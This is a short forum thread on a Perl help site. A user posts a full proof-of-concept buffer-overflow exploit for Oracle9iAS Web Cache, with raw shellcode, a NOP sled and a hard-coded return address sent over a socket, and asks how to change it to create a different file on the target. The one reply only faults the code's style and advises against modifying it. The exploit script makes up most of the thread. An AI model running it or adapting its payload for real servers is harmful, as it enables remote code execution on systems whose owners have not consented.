CGI/Perl Guide | Learning Center | Forums | Advertise | Login
Site Search: in

  Main Index MAIN
INDEX
Search Posts SEARCH
POSTS
Who's Online WHO'S
ONLINE
Log in LOG
IN

Home: Perl Programming Help: Beginner:
Help me understand this script please

 



honeyfairy
New User

Jan 27, 2018, 8:50 PM

Post #1 of 2 (2802 views)
Help me understand this script please Can't Post

Hi there everyone!
Could you explain the following code to me? I know absolutely naught in perl.

This is a code to test for a vulnerability on a web server.

It currently creates a the file C:\defcom.iyd - I want to modify it to create another file



Code
#!perl 
#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;



BillKSmith
Veteran

Jan 28, 2018, 9:11 PM

Post #2 of 2 (2782 views)
Re: [honeyfairy] Help me understand this script please [In reply to] Can't Post

All that this script does is connect to something with a socket and then send it a message. Any useful work is encoded in the message.

I strongly recommend against any attempt to modify this code. Even its comments say that it was intended as 'proof of concept', not as production code. I doubt that it would even work with a modern installation of perl.

It falls short of 'good practice' in several ways:

  • It uses the module Socket. The documentation for that module say that it is not intended to be used directly but only by higher level modules such as IO::Socket.

  • It fails to list the symbols it expects Socket to export as recommended in Socket's document.

  • It calls the methods of Socket as functions rather than methods.

  • The message is coded as a string of hex characters. The human reader has no idea what it is intended to do

  • It does not use 'use strict;' or 'use warnings;' These would be a big help to anyone making changes because they alert you to errors they may have made.

  • Good Luck,
    Bill

  •  
     


    Search for (options) Powered by Gossamer Forum v.1.2.0

    Web Applications & Managed Hosting Powered by Gossamer Threads
    Visit our Mailing List Archives